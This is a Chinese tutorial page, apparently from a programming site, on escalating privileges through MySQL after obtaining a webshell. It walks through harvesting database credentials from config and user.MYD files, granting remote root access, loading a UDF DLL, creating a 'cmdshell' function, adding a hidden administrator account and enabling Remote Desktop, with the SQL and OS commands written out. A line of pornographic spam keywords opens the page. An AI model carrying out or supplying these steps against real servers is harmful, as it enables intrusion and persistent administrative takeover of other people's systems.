欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

mysql數(shù)據(jù)庫提權(quán)的三種方法

 更新時間:2024年09月19日 10:22:10   作者:feing.  
文介紹了MySQL數(shù)據(jù)庫的三種提權(quán)方法:UDF提權(quán)、MOF提權(quán)和啟動項提權(quán),同時列出了一些常見數(shù)據(jù)庫及其默認端口,下面就來介紹一下,感興趣的可以了解一下

MySql提權(quán)的三種方式:

  • udf提權(quán)
  • mof提權(quán)
  • 啟動項提權(quán)

以下是一些常見的數(shù)據(jù)庫及其默認端口:

1. MySQL: 默認端口為 3306

2. PostgreSQL: 默認端口為 5432

3. Oracle Database: 默認端口為 1521

4. Microsoft SQL Server: 默認端口為 1433

5. MongoDB: 默認端口為 27017

6. Redis: 默認端口為 6379

7. Elasticsearch: 默認端口為 9200 (HTTP) 和 9300 (內(nèi)部通信)

8. Cassandra: 默認端口為 9042

9. SQLite: 通常是本地文件系統(tǒng),沒有固定端口

10. DB2: 默認端口為 50000

11.國產(chǎn)的DM達夢數(shù)據(jù)庫, 默認端口號為:5236;

mysql_UDF 提權(quán):

拿到webshell之后,進行數(shù)據(jù)庫提權(quán)操作

一、端口掃描

二、信息收集:

如何獲取mysql賬號密碼

1.查看網(wǎng)站配置文件。

如:conn、config、data、sql、common 、inc、include等。

2.Mysql配置文件:C:\phpStudy\MySQL\data\mysql\user.MYD

例如:DVWA默認數(shù)據(jù)庫存儲在:C:/phpStudy/WWW/DVWA/config/config.inc.php.dist目錄

點擊查看:賬號:root 密碼:root

查看數(shù)據(jù)庫安裝路徑下的mysql文件 安裝目錄為/data/mysql/user.myd和user.myi

放到MD5在線網(wǎng)站進行解密

三、提權(quán)利用

注意事項:提權(quán)的第一步要知道數(shù)據(jù)庫的版本號:

(1)如果mysql<5.1    導出目錄 c:\windows 或  c:\windows\system32

(2)mysql=>5.1   導出安裝目錄\MySQL\lib\plugin

注*:默認mysql不能遠程連接,需要用菜刀進行本地連接

選擇mysql,填寫好賬號:root 密碼root,確認好提交進行連接

設(shè)置遠程連接,用于在本地連接。

mysql> GRANT ALL PRIVILEGES ON *.* TO root@"%" IDENTIFIED BY "root";
mysql> flush privileges; 重新加載權(quán)限數(shù)據(jù)

數(shù)據(jù)庫版本為5.5.53

由于本次實驗數(shù)據(jù)庫為5.5.53,因此選擇\MySQL\lib\plugin目錄。

提示報錯

前提條件為:secure_file_priv等于空,需要在my.ini配置文件中進行設(shè)置

修改之后,查看安裝dll文件完成。

創(chuàng)建cmdshell函數(shù),執(zhí)行操作系統(tǒng)命令。

Create Function cmdshell returns string soname 'udf.dll';

使用cmdshll函數(shù)執(zhí)行操作系統(tǒng)命令

select cmdshell('whoami');
select cmdshell('net user 123 123/add');    添加用戶
select cmdshell('net localgroup administrators 123 /add');    將123用戶添加到管理組

開3389進行遠程連接

Create Function open3389 returns string soname 'udf.dll';
select open3389();    開啟3389遠程連接

注意:僅用于技術(shù)討論,切勿用于其他用途,一切后果與本人無關(guān)。

到此這篇關(guān)于mysql數(shù)據(jù)庫提權(quán)的三種方法的文章就介紹到這了,更多相關(guān)mysql數(shù)據(jù)庫提權(quán)內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

相關(guān)文章

  • MySQL5.7不停業(yè)務(wù)將傳統(tǒng)復制變更為GTID復制的實例

    MySQL5.7不停業(yè)務(wù)將傳統(tǒng)復制變更為GTID復制的實例

    下面小編就為大家?guī)硪黄狹ySQL5.7不停業(yè)務(wù)將傳統(tǒng)復制變更為GTID復制的實例。小編覺的挺不錯的,現(xiàn)在就分享給大家,也給大家做個參考。一起跟隨小編過來看看吧
    2017-03-03
  • MySQL視圖原理與基本操作示例

    MySQL視圖原理與基本操作示例

    這篇文章主要介紹了MySQL視圖原理與基本操作,簡單描述了mysql視圖的概念、功能并結(jié)合實例形式分析了mysql視圖的創(chuàng)建、查詢、修改、刪除等相關(guān)操作技巧,需要的朋友可以參考下
    2018-03-03
  • Windows下MySQL安裝配置方法圖文教程

    Windows下MySQL安裝配置方法圖文教程

    這篇文章主要為大家分享了Windows下MySQL安裝配置方法圖文教程,感興趣的朋友可以參考一下
    2016-06-06
  • 定位和優(yōu)化mysql慢查詢的常見方法分享

    定位和優(yōu)化mysql慢查詢的常見方法分享

    MySQL中的慢查詢(Slow Query)指執(zhí)行時間超過指定閾值的查詢語句,默認閾值是long_query_time參數(shù)設(shè)置的秒值,MySQL有幾種常見的方法可以發(fā)現(xiàn)和獲取慢查詢,接下來小編將給大家詳細的介紹一下這些方法,需要的朋友可以參考下
    2023-08-08
  • MySQL多層級結(jié)構(gòu)-區(qū)域表使用樹詳解

    MySQL多層級結(jié)構(gòu)-區(qū)域表使用樹詳解

    前面我們大概介紹了一下樹結(jié)構(gòu)表的基本使用。在我們項目中有好幾塊有用到多層級的概念。下面我們哪大家都比較熟悉的區(qū)域表來做演示
    2016-07-07
  • MySQL 數(shù)據(jù)類型 大全

    MySQL 數(shù)據(jù)類型 大全

    mysql下的一些數(shù)據(jù)類型,后面附有類型的說明。
    2009-04-04
  • mysql中全連接full join...on...的用法說明

    mysql中全連接full join...on...的用法說明

    這篇文章主要介紹了mysql中全連接full join...on...的用法說明,具有很好的參考價值,希望對大家有所幫助。如有錯誤或未考慮完全的地方,望不吝賜教
    2023-03-03
  • centOS下mysql workbench安裝配置教程

    centOS下mysql workbench安裝配置教程

    這篇文章主要為大家詳細介紹了centOS下mysql workbench安裝配置教程,具有一定的參考價值,感興趣的小伙伴們可以參考一下
    2017-11-11
  • MySQL如何改變表的存儲引擎方式

    MySQL如何改變表的存儲引擎方式

    這篇文章主要介紹了MySQL如何改變表的存儲引擎方式,具有很好的參考價值,希望對大家有所幫助,如有錯誤或未考慮完全的地方,望不吝賜教
    2023-11-11
  • MySQL對中文進行排序詳解及實例

    MySQL對中文進行排序詳解及實例

    這篇文章主要介紹了MySQL對中文進行排序詳解及實例的相關(guān)資料,需要的朋友可以參考下
    2017-05-05

最新評論